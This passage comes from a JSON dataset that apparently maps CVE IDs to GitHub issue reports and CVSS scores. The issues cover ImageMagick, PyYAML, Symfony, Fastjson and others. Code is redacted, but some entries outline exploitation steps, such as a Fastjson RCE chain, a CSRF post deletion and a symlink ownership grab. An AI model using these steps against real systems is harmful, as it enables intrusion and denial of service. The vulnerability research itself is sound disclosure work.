  11761. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  11762. "severity": "MEDIUM",
  11763. "baseScore": 5.3,
  11764. "impactScore": 3.6,
  11765. "exploitabilityScore": 1.6
  11766. },
  11767. {
  11768. "CVE_ID": "CVE-2017-18250",
  11769. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/793",
  11770. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/793",
  11771. "Repo_new": "imagemagick/imagemagick",
  11772. "Issue_Created_At": "2017-09-30T07:07:50Z",
  11773. "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG CODETAG APITAG may return NULL, so the following operations on the \"log\" will dereference null pointer to cause memory error.",
  11774. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11775. "severity": "MEDIUM",
  11776. "baseScore": 6.5,
  11777. "impactScore": 3.6,
  11778. "exploitabilityScore": 2.8
  11779. },
  11780. {
  11781. "CVE_ID": "CVE-2017-18251",
  11782. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/809",
  11783. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/809",
  11784. "Repo_new": "imagemagick/imagemagick",
  11785. "Issue_Created_At": "2017-09-30T07:26:22Z",
  11786. "description": "memory leak in APITAG Here is the critical code : (in APITAG ERRORTAG APITAG may return NULL,if one of the \u201cchroma1\u201d \u3001\u201cchroma2\u201d and \u201dluma\u201d is NULL at least\uff0cand the other is not\uff0cthis may cause memory leak error in \u201cIf statement\u201d.",
  11787. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11788. "severity": "MEDIUM",
  11789. "baseScore": 6.5,
  11790. "impactScore": 3.6,
  11791. "exploitabilityScore": 2.8
  11792. },
  11793. {
  11794. "CVE_ID": "CVE-2017-18252",
  11795. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/802",
  11796. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/802",
  11797. "Repo_new": "imagemagick/imagemagick",
  11798. "Issue_Created_At": "2017-09-30T07:15:01Z",
  11799. "description": "assertion failure in APITAG Here is the critical code : (in APITAG ERRORTAG APITAG may return NULL (in line NUMBERTAG and in APITAG CODETAG If the \"replace\" is NULL,it will may cause assertion failure.",
  11800. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11801. "severity": "MEDIUM",
  11802. "baseScore": 6.5,
  11803. "impactScore": 3.6,
  11804. "exploitabilityScore": 2.8
  11805. },
  11806. {
  11807. "CVE_ID": "CVE-2017-18253",
  11808. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/794",
  11809. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/794",
  11810. "Repo_new": "imagemagick/imagemagick",
  11811. "Issue_Created_At": "2017-09-30T07:08:32Z",
  11812. "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG CODETAG APITAG may return NULL, so some of the following operations on the \"device >platform_name\" will dereference null pointer to cause memory error.",
  11813. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11814. "severity": "MEDIUM",
  11815. "baseScore": 6.5,
  11816. "impactScore": 3.6,
  11817. "exploitabilityScore": 2.8
  11818. },
  11819. {
  11820. "CVE_ID": "CVE-2017-18254",
  11821. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/808",
  11822. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/808",
  11823. "Repo_new": "imagemagick/imagemagick",
  11824. "Issue_Created_At": "2017-09-30T07:24:57Z",
  11825. "description": "memory leak in APITAG Here is the critical code : (in APITAG ERRORTAG APITAG may return NULL,if one of the \u201cglobal_colormap\u201d and \u201dcolormap\u201d is NULL\uff0cand the other is not\uff0cthis may cause memory leak error in \u201cIf statement\u201d.",
  11826. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11827. "severity": "MEDIUM",
  11828. "baseScore": 6.5,
  11829. "impactScore": 3.6,
  11830. "exploitabilityScore": 2.8
  11831. },
  11832. {
  11833. "CVE_ID": "CVE-2017-18271",
  11834. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/911",
  11835. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/911",
  11836. "Repo_new": "imagemagick/imagemagick",
  11837. "Issue_Created_At": "2017-12-22T05:36:06Z",
  11838. "description": "CPU exhaustion in APITAG INFO Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU and Memory consumption. (CPU NUMBERTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib The FILETAG is as following CODETAG Trigger Command: magick convert cpu exhaustion APITAG /dev/null DEBUG when debug we found the following code is lack of EOF check, which cause a infinite loop ERRORTAG testcase: URLTAG",
  11839. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11840. "severity": "MEDIUM",
  11841. "baseScore": 6.5,
  11842. "impactScore": 3.6,
  11843. "exploitabilityScore": 2.8
  11844. },
  11845. {
  11846. "CVE_ID": "CVE-2017-18272",
  11847. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/918",
  11848. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/918",
  11849. "Repo_new": "imagemagick/imagemagick",
  11850. "Issue_Created_At": "2017-12-26T01:16:50Z",
  11851. "description": "heap use after free in APITAG INFO Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png tiff webp wmf x xml zlib Trigger Command: PATHTAG identify verbose use after free APITAG ASAN OUTPUT ERRORTAG testcase: URLTAG",
  11852. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11853. "severity": "MEDIUM",
  11854. "baseScore": 6.5,
  11855. "impactScore": 3.6,
  11856. "exploitabilityScore": 2.8
  11857. },
  11858. {
  11859. "CVE_ID": "CVE-2017-18273",
  11860. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/910",
  11861. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/910",
  11862. "Repo_new": "imagemagick/imagemagick",
  11863. "Issue_Created_At": "2017-12-22T02:51:14Z",
  11864. "description": "cpu exhaustion in APITAG INFO Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU and Memory consumption. (CPU NUMBERTAG Memory NUMBERTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib The FILETAG is as following APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Trigger Command: magick convert ./cpu exhaustion APITAG /dev/null DEBUG When debug we found a infinite loop in APITAG at APITAG CODETAG testcase: URLTAG",
  11865. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  11866. "severity": "MEDIUM",
  11867. "baseScore": 6.5,
  11868. "impactScore": 3.6,
  11869. "exploitabilityScore": 2.8
  11870. },
  11871. {
  11872. "CVE_ID": "CVE-2017-18342",
  11873. "Issue_Url_old": "https://github.com/marshmallow-code/apispec/issues/278",
  11874. "Issue_Url_new": "https://github.com/marshmallow-code/apispec/issues/278",
  11875. "Repo_new": "marshmallow-code/apispec",
  11876. "Issue_Created_At": "2018-09-04T17:18:15Z",
  11877. "description": "Use APITAG in 'load_yaml_from_docstring'. Hi there! APITAG for providing a great project. Because APITAG has known security issues URLTAG , would it be feasible to use the existing APITAG option instead of APITAG here URLTAG for APITAG ? I'm happy to put in a PR if you agree. It looks like FILETAG . It doesn't look like there's been much activity by APITAG to move forward with making APITAG safe by default. Here is the pending APITAG NUMBERTAG release plan: URLTAG The APITAG security vulnerability is being flagged for our FEC API URLTAG . Please let me know if you have any questions, and thanks! Laura",
  11878. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11879. "severity": "CRITICAL",
  11880. "baseScore": 9.8,
  11881. "impactScore": 5.9,
  11882. "exploitabilityScore": 3.9
  11883. },
  11884. {
  11885. "CVE_ID": "CVE-2017-18342",
  11886. "Issue_Url_old": "https://github.com/yaml/pyyaml/issues/193",
  11887. "Issue_Url_new": "https://github.com/yaml/pyyaml/issues/193",
  11888. "Repo_new": "yaml/pyyaml",
  11889. "Issue_Created_At": "2018-06-29T18:44:32Z",
  11890. "description": "APITAG NUMBERTAG Release Plan. Synopsis Make release NUMBERTAG with current master Make PR to revert NUMBERTAG APITAG team fixes broken pyyaml build system Builds wheels with libyaml NUMBERTAG linked in Fix any other NUMBERTAG blocker issues Merge in successor to NUMBERTAG IF_ it reaches approval consensus Release NUMBERTAG to APITAG Continue to work on successor if not part of NUMBERTAG Bump version to NUMBERTAG when merged The APITAG Release Situatation The most recent APITAG NUMBERTAG was released Aug NUMBERTAG At that time, Kirill turned over maintenance of APITAG and APITAG to MENTIONTAG and MENTIONTAG . Since then about NUMBERTAG PRs have been applied to APITAG and about NUMBERTAG to APITAG APITAG has a release builder: URLTAG It builds APITAG wheels against specific versions combinations of APITAG APITAG APITAG This builder no longer works and it's complicated by the fact that the build process for libyaml has been changed. The APITAG team is working hard to fix it. The NUMBERTAG release attempt was rushed out because we knew that APITAG NUMBERTAG doesn't work with Python NUMBERTAG which went out this week. We had a fix for that in master, and so we tried to get it out in time for NUMBERTAG We thought we had a Jenkins build system that would build the wheels as soon as the sdist was uploaded. So we pushed the release only to find out minutes later that this build system wasn't set up to build with libyaml. We were going to have to use the pyyaml build system. After NUMBERTAG hours of work on the windows/wheels system we decided to pull the plug on NUMBERTAG We didn't have wheels and we were getting reports of other things that were wrong. We didn't have a sense that the build system was going to get fixed soon, and we are all volunteers with limited time. Soon after the release I learned about PR NUMBERTAG and was completely surprised to find that something this big went in without my seeing it. 
Looking back now I remember that I had a lot going on in my life at that specific time NUMBERTAG is a non backwards compatible change at the most basic level. It changes how the dump and load functions behave. The intent of the change is a good one: Currently APITAG has the sugar API: dump, load, safe_dump, safe_load APITAG has had that API since version NUMBERTAG APITAG NUMBERTAG APITAG is trivial to exploit on untrusted data Change load and dump to be aliases to safe_load and safe_dump Add alarming (danger_ ) new functions for the old load and dump But this change has contentions: It's non back compat and is going to affect a ton of existing code The name danger is misleading when used in completely safe ways In addition, danger_dump is not known to be exploitable in any way APITAG has known about this and had a safe_ solution in place from the start People are just not feeling comfortable with the defaults The change is important, worthy of a major release, but is not ready to be part of APITAG in its current form. A new PR, building from NUMBERTAG and NUMBERTAG should be worked on. The Current Plan Forward We need to get APITAG released soon, if only for the Python NUMBERTAG release. We can't make any release at all until the build system works again. IOW, we couldn't even re release NUMBERTAG right now. The NUMBERTAG API change is big and it is more important to get it right than to rush it out. ie It APITAG may be a big can of gasoline, but nothing's on fire. ie NUMBERTAG doesn't \"fix\" anything. It just changes a default to something that's always been safe and available. There are NUMBERTAG other changes that I'd like to tackle in the next release, while at the same time taming a broken release process. My hope is that when we figure this out, it will be easy to put out APITAG releases on a regular basis. We went from NUMBERTAG to NUMBERTAG because this was a big release. 
It's big with or without NUMBERTAG I would like to see APITAG NUMBERTAG get out in the next few days. If the successor to NUMBERTAG is ready and approved by the time we are ready to upload NUMBERTAG it can go in. If not, then I think it should be the focus of a NUMBERTAG release. It's a big enough change to trigger a major release. It should be in the first release of either NUMBERTAG or NUMBERTAG",
  11891. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11892. "severity": "CRITICAL",
  11893. "baseScore": 9.8,
  11894. "impactScore": 5.9,
  11895. "exploitabilityScore": 3.9
  11896. },
  11897. {
  11898. "CVE_ID": "CVE-2017-18343",
  11899. "Issue_Url_old": "https://github.com/symfony/symfony/issues/27987",
  11900. "Issue_Url_new": "https://github.com/symfony/symfony/issues/27987",
  11901. "Repo_new": "symfony/symfony",
  11902. "Issue_Created_At": "2018-07-18T22:16:19Z",
  11903. "description": "Security Vulnerability Cross site Scripting. Symfony Debug version(s) affected NUMBERTAG Injection Technical Details URL: PATHTAG NUMBERTAG APITAG =om3rcitak Parameter Type: Parameter Name Attack Pattern: APITAG APITAG Repro $ APITAG $ cd laravel $ APITAG $ APITAG $ php artisan serve and visit: PATHTAG NUMBERTAG APITAG =om3rcitak Possible Solution Actually your fix this vulnerability NUMBERTAG ersion but laravel NUMBERTAG using symfony/debug NUMBERTAG Your should be same fix for NUMBERTAG ersions. Notes: I am testing laravel debugger latest version NUMBERTAG for Laravel NUMBERTAG This vulnerability not effected Laravel NUMBERTAG or laravel debugger NUMBERTAG because Laravel using different error page template for version NUMBERTAG and NUMBERTAG",
  11904. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  11905. "severity": "MEDIUM",
  11906. "baseScore": 6.1,
  11907. "impactScore": 2.7,
  11908. "exploitabilityScore": 2.8
  11909. },
  11910. {
  11911. "CVE_ID": "CVE-2017-18343",
  11912. "Issue_Url_old": "https://github.com/barryvdh/laravel-debugbar/issues/850",
  11913. "Issue_Url_new": "https://github.com/barryvdh/laravel-debugbar/issues/850",
  11914. "Repo_new": "barryvdh/laravel-debugbar",
  11915. "Issue_Created_At": "2018-07-18T21:38:40Z",
  11916. "description": "Security Vulnerability Cross site Scripting. Security Vulnerability Cross site Scripting Environment Version : debugbar NUMBERTAG laravel NUMBERTAG OS : Unix, Windows Web server : Any web server PHP : APITAG alert NUMBERTAG APITAG =om3rcitak Parameter Type: Parameter Name Attack Pattern: APITAG APITAG Repro $ APITAG $ cd laravel $ APITAG $ APITAG $ php artisan serve and visit: PATHTAG NUMBERTAG APITAG =om3rcitak Notes: I am testing laravel debugger latest version NUMBERTAG for Laravel NUMBERTAG This vulnerability not effected Laravel NUMBERTAG or laravel debugger NUMBERTAG because Laravel using different error page template for version NUMBERTAG and NUMBERTAG",
  11917. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  11918. "severity": "MEDIUM",
  11919. "baseScore": 6.1,
  11920. "impactScore": 2.7,
  11921. "exploitabilityScore": 2.8
  11922. },
  11923. {
  11924. "CVE_ID": "CVE-2017-18349",
  11925. "Issue_Url_old": "https://github.com/pippo-java/pippo/issues/466",
  11926. "Issue_Url_new": "https://github.com/pippo-java/pippo/issues/466",
  11927. "Repo_new": "pippo-java/pippo",
  11928. "Issue_Created_At": "2018-10-15T05:11:23Z",
  11929. "description": "lead to RCE when parse JSON string with Fastjson. The component APITAG converts a JSON string to an equivalent Java Object based on Fastjson(version NUMBERTAG APITAG version NUMBERTAG and prior has a remote code execution vulnerability. for details,please refer to the links below: URLTAG URLTAG APITAG Upgrade to Fastjson version NUMBERTAG or later can fix the issue. Using the following code snippet to convert a JSON string: CODETAG To exploit the vulnerability successfully,we need the following steps: step1:start a rmi service; ERRORTAG step2:put the APITAG under a web service directory which pointed by the rmi service above; ERRORTAG step3:send a post request contains the malicious JSON string; FILETAG",
  11930. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  11931. "severity": "CRITICAL",
  11932. "baseScore": 9.8,
  11933. "impactScore": 5.9,
  11934. "exploitabilityScore": 3.9
  11935. },
  11936. {
  11937. "CVE_ID": "CVE-2017-18361",
  11938. "Issue_Url_old": "https://github.com/Pylons/colander/issues/290",
  11939. "Issue_Url_new": "https://github.com/pylons/colander/issues/290",
  11940. "Repo_new": "pylons/colander",
  11941. "Issue_Created_At": "2017-04-26T09:11:05Z",
  11942. "description": "Unclosed parenthesis in URL causes infinite loop. When there is an unclosed parenthesis in URL and we use _url_ validator, it causes an infinite loop. What's more interesting is that it only happens when the unclosed parenthesis is followed by many characters (check test case number NUMBERTAG and NUMBERTAG CODETAG In addition, if you check it in an online regex checker ( URLTAG it also fails. Try this regex, it's used for URL validation in colander. It's taken from PATHTAG I only escaped two slashes here. APITAG Use this URL: _ FILETAG and you'll get _catastrophic backtracking_. You can use debugger on that site to check which group falls in infinite loop.",
  11943. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  11944. "severity": "HIGH",
  11945. "baseScore": 7.5,
  11946. "impactScore": 3.6,
  11947. "exploitabilityScore": 3.9
  11948. },
  11949. {
  11950. "CVE_ID": "CVE-2017-18366",
  11951. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/477",
  11952. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/477",
  11953. "Repo_new": "intelliants/subrion",
  11954. "Issue_Created_At": "2017-06-30T19:41:33Z",
  11955. "description": "Critical : Remove Blog Post using CSRF attack. Hi subrion security team, Bug Description Cross site request forgery(CSRF), also known as a one click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Steps to reproduce CODETAG NUMBERTAG Save this as FILETAG NUMBERTAG Replace <post id> to post number which post you want to delete NUMBERTAG now open FILETAG via browser where you logged in with Subrion CMS NUMBERTAG Click on Submit request button NUMBERTAG the post will delete automatically. Impact An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application. How to fix this vulnerability Check if this form requires CSRF protection and implement CSRF countermeasures if necessary. Regards, Rudra Sarkar URLTAG FILETAG",
  11956. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  11957. "severity": "HIGH",
  11958. "baseScore": 8.8,
  11959. "impactScore": 5.9,
  11960. "exploitabilityScore": 2.8
  11961. },
  11962. {
  11963. "CVE_ID": "CVE-2017-18367",
  11964. "Issue_Url_old": "https://github.com/seccomp/libseccomp-golang/issues/22",
  11965. "Issue_Url_new": "https://github.com/seccomp/libseccomp-golang/issues/22",
  11966. "Repo_new": "seccomp/libseccomp-golang",
  11967. "Issue_Created_At": "2017-04-19T19:56:01Z",
  11968. "description": "BUG: Handling of multiple syscall arguments incorrect. Issue originally identified at URLTAG Presently, when adding a rule with multiple syscall arguments, we add each argument separately with a separate call to APITAG and a single syscall specified. This produces an OR relationship between the arguments IE, we will match if any of the arguments match. However, using libseccomp directly, adding multiple rules at the same time with a single API call will result in an AND relationship the rule will only match if all of the arguments match. Matching the behavior of the library is important, and at present use cases requiring APITAG syscall rules are not supported.",
  11969. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  11970. "severity": "HIGH",
  11971. "baseScore": 7.5,
  11972. "impactScore": 3.6,
  11973. "exploitabilityScore": 3.9
  11974. },
  11975. {
  11976. "CVE_ID": "CVE-2017-18376",
  11977. "Issue_Url_old": "https://github.com/TheHive-Project/TheHive/issues/408",
  11978. "Issue_Url_new": "https://github.com/thehive-project/thehive/issues/408",
  11979. "Repo_new": "thehive-project/thehive",
  11980. "Issue_Created_At": "2017-12-22T15:13:08Z",
  11981. "description": "THP SEC AD NUMBERTAG Privilege Escalation in all Versions of APITAG Request Type Bug Problem Description A privilege escalation vulnerability has been identified in APITAG It allows users with read only or read/write access to escalate their privileges and eventually become administrators. Conditions To exploit the vulnerability, an attacker must have access to an account on APITAG with read only or read/write privileges. The attacker needs to interact with the API in a specific though trivial way to obtain administrator privileges. After verifying that their request has been correctly processed, they connect To APITAG using the Web UI and they will see the administrator menu from where they can edit or lock user accounts, add case templates, etc. Impacted Versions This vulnerability impacts all versions of APITAG as of this writing, including APITAG NUMBERTAG APITAG NUMBERTAG Possible Solutions APITAG Project has confirmed the vulnerability and a hotfix for Mellifera NUMBERTAG APITAG NUMBERTAG and Cerana NUMBERTAG APITAG NUMBERTAG will be released very soon. Credits The vulnerability has been found and reported by Jeffrey Everling.",
  11982. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  11983. "severity": "HIGH",
  11984. "baseScore": 8.8,
  11985. "impactScore": 5.9,
  11986. "exploitabilityScore": 2.8
  11987. },
  11988. {
  11989. "CVE_ID": "CVE-2017-18594",
  11990. "Issue_Url_old": "https://github.com/nmap/nmap/issues/1227",
  11991. "Issue_Url_new": "https://github.com/nmap/nmap/issues/1227",
  11992. "Repo_new": "nmap/nmap",
  11993. "Issue_Created_At": "2018-05-27T23:28:05Z",
  11994. "description": "Crash in libssh when port NUMBERTAG response is unexpected. Nmap NUMBERTAG crashes when running either of the following two scripts against an open port NUMBERTAG which is not recognised as SSH: APITAG and APITAG . ERRORTAG I managed to narrow it down to these scripts and one particular host, and created a minimised test case that can be run locally: APITAG APITAG This will cause a crash, sometimes with Segmentation fault or sometimes with double free or corruption . Sample output with APITAG : ERRORTAG If I disable those two scripts, then Nmap doesn't crash, and the host output looks like: CODETAG Hope that helps in diagnosing the issue. Please can you look into it?",
  11995. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  11996. "severity": "HIGH",
  11997. "baseScore": 7.5,
  11998. "impactScore": 3.6,
  11999. "exploitabilityScore": 3.9
  12000. },
  12001. {
  12002. "CVE_ID": "CVE-2017-18594",
  12003. "Issue_Url_old": "https://github.com/nmap/nmap/issues/1077",
  12004. "Issue_Url_new": "https://github.com/nmap/nmap/issues/1077",
  12005. "Repo_new": "nmap/nmap",
  12006. "Issue_Created_At": "2017-12-04T20:18:13Z",
  12007. "description": "NMAP crash with ssh auth APITAG When testing ssh auth methods.nse against non standard ports, I forgot to specify ports and NMAP crashed. I have narrowed it down to running the script against port NUMBERTAG I ran a debug and found the crash appears to be caused by a double free of session data. This appears to be due to a session pointer not being APITAG after the session is freed. Attached is a patch that appears to fix the issue. FILETAG",
  12008. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  12009. "severity": "HIGH",
  12010. "baseScore": 7.5,
  12011. "impactScore": 3.6,
  12012. "exploitabilityScore": 3.9
  12013. },
  12014. {
  12015. "CVE_ID": "CVE-2017-18635",
  12016. "Issue_Url_old": "https://github.com/novnc/noVNC/issues/748",
  12017. "Issue_Url_new": "https://github.com/novnc/novnc/issues/748",
  12018. "Repo_new": "novnc/novnc",
  12019. "Issue_Created_At": "2017-01-12T19:58:56Z",
  12020. "description": "FILETAG , as well as APITAG",
  12021. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12022. "severity": "MEDIUM",
  12023. "baseScore": 6.1,
  12024. "impactScore": 2.7,
  12025. "exploitabilityScore": 2.8
  12026. },
  12027. {
  12028. "CVE_ID": "CVE-2017-18638",
  12029. "Issue_Url_old": "https://github.com/graphite-project/graphite-web/issues/2008",
  12030. "Issue_Url_new": "https://github.com/graphite-project/graphite-web/issues/2008",
  12031. "Repo_new": "graphite-project/graphite-web",
  12032. "Issue_Created_At": "2017-07-28T22:37:00Z",
  12033. "description": "APITAG vulnerable to SSRF. (I didn't discover this, it was publicly described here: URLTAG URLTAG Some sort of validation should be performed on the server component of the URL (possibly a whitelist in settings ? I'm not overly familiar with the design of this module). Currently it's possible to use this view to make HTTP requests to services visible from the server.",
  12034. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  12035. "severity": "HIGH",
  12036. "baseScore": 7.5,
  12037. "impactScore": 3.6,
  12038. "exploitabilityScore": 3.9
  12039. },
  12040. {
  12041. "CVE_ID": "CVE-2017-18869",
  12042. "Issue_Url_old": "https://github.com/isaacs/chownr/issues/14",
  12043. "Issue_Url_new": "https://github.com/isaacs/chownr/issues/14",
  12044. "Repo_new": "isaacs/chownr",
  12045. "Issue_Created_At": "2017-07-02T07:22:36Z",
  12046. "description": "This package appears to have a TOCTOU bug. CVETAG",
  12047. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
  12048. "severity": "LOW",
  12049. "baseScore": 2.5,
  12050. "impactScore": 1.4,
  12051. "exploitabilityScore": 1.0
  12052. },
  12053. {
  12054. "CVE_ID": "CVE-2017-18924",
  12055. "Issue_Url_old": "https://github.com/oauthjs/node-oauth2-server/issues/637",
  12056. "Issue_Url_new": "https://github.com/oauthjs/node-oauth2-server/issues/637",
  12057. "Repo_new": "oauthjs/node-oauth2-server",
  12058. "Issue_Created_At": "2020-07-16T00:26:02Z",
  12059. "description": "Multiple Security Vulnerabilities in Auth and Token Endpoint. I would like to report several security vulnerabilities that I found while using this APITAG server library. The vulnerabilities and their consequences are listed as following: Vulnerability NUMBERTAG Missing PKCE support for public clients. APITAG As specified in RFC NUMBERTAG URLTAG public clients (e.g., mobile/desktop apps) using Authorization Code Flow are susceptible to authorization code interception attack and PKCE is recommended to mitigate this attack. Since public clients cannot maintain client side confidentiality regarding client secrets, such attacks have been noticed in the wild extensively. Vulnerability NUMBERTAG Does not revoke previously issued token if authorization_code is used more than once. APITAG As specified in RFC NUMBERTAG FILETAG If an authorization code is used more than once, the authorization server must deny the request and should revoke all tokens previously issued based on that authorization code. Though APITAG server currently denies the request in such cases, it doesn't revoke the tokens issued previously to the client, which leaves the user's resources vulnerable as attackers might exploit the previous tokens to get them. Vulnerability NUMBERTAG Allows fragment in the redirect URI. APITAG Many APITAG attacks regarding misuse of redirect uris have been observed in the wild. As specified in the RFC NUMBERTAG FILETAG authorization server should not allow fragments in the redirect uri as it allows the attackers to exploit the redirect uri and hence intercept the auth_code/token. Any comments or fixes regarding these vulnerabilities? Thank you.",
  12060. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  12061. "severity": "HIGH",
  12062. "baseScore": 7.5,
  12063. "impactScore": 3.6,
  12064. "exploitabilityScore": 3.9
  12065. },
  12066. {
  12067. "CVE_ID": "CVE-2017-18925",
  12068. "Issue_Url_old": "https://github.com/OpenRC/opentmpfiles/issues/4",
  12069. "Issue_Url_new": "https://github.com/openrc/opentmpfiles/issues/4",
  12070. "Repo_new": "openrc/opentmpfiles",
  12071. "Issue_Created_At": "2017-12-24T15:04:21Z",
  12072. "description": "Unsafe use of \"chown dereference\" in directory types. The default behavior of chown when called _without_ the APITAG flag is to follow symlinks. At least the d type, and possibly the f type, can exploit that fact to take ownership of arbitrary files on the system. For example, CODETAG The first time that opentmpfiles setup is run, things are fine; but then suppose I replace \"foo\" with a symlink: APITAG and restart the service... ERRORTAG The call to chown has followed my symlink, and given me ownership of APITAG : APITAG The tmpfiles specification is silent on whether or not symlinks should be followed in this case, however, the same vulnerability was addressed in APITAG checkpath helper in Gentoo bug NUMBERTAG CVETAG .",
  12073. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  12074. "severity": "MEDIUM",
  12075. "baseScore": 5.5,
  12076. "impactScore": 3.6,
  12077. "exploitabilityScore": 1.8
  12078. },
  12079. {
  12080. "CVE_ID": "CVE-2017-20004",
  12081. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/41622",
  12082. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/41622",
  12083. "Repo_new": "rust-lang/rust",
  12084. "Issue_Created_At": "2017-04-29T07:11:01Z",
  12085. "description": "APITAG APITAG must not be sync. Right now, APITAG satisfies the Sync bound. That is rather bad, because it lets me write a program that has a data race: ERRORTAG The get and set calls in the two threads are unsynchronized (as usual for a Cell ), and they are racing. This is a soundness bug. The cause for this is that APITAG implements Sync whenever T implements Send , which is plain wrong. The fix is to let APITAG implement Sync whenever T implements Sync . I will submit a PR soon.",
  12086. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  12087. "severity": "MEDIUM",
  12088. "baseScore": 5.9,
  12089. "impactScore": 3.6,
  12090. "exploitabilityScore": 2.2
  12091. },
  12092. {
  12093. "CVE_ID": "CVE-2017-3204",
  12094. "Issue_Url_old": "https://github.com/golang/go/issues/19767",
  12095. "Issue_Url_new": "https://github.com/golang/go/issues/19767",
  12096. "Repo_new": "golang/go",
  12097. "Issue_Created_At": "2017-03-29T15:29:51Z",
  12098. "description": "PATHTAG make APITAG APITAG non permissive by default. APITAG interprets nil as \"accept any host keys\". This is not a great default from a security perspective. Many clients probably should set APITAG to something real but are not. It was written this way in PATHTAG to preserve backwards compatibility with the original implementation, but that was probably not the right balance to strike. This issue is to make APITAG mean \"reject all host keys\" and at the same time provide at least func APITAG APITAG func APITAG []byte) APITAG and maybe also func APITAG string) APITAG Thanks to Phil Pennock for pointing out this problem.",
  12099. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12100. "severity": "HIGH",
  12101. "baseScore": 8.1,
  12102. "impactScore": 5.9,
  12103. "exploitabilityScore": 2.2
  12104. },
  12105. {
  12106. "CVE_ID": "CVE-2017-5207",
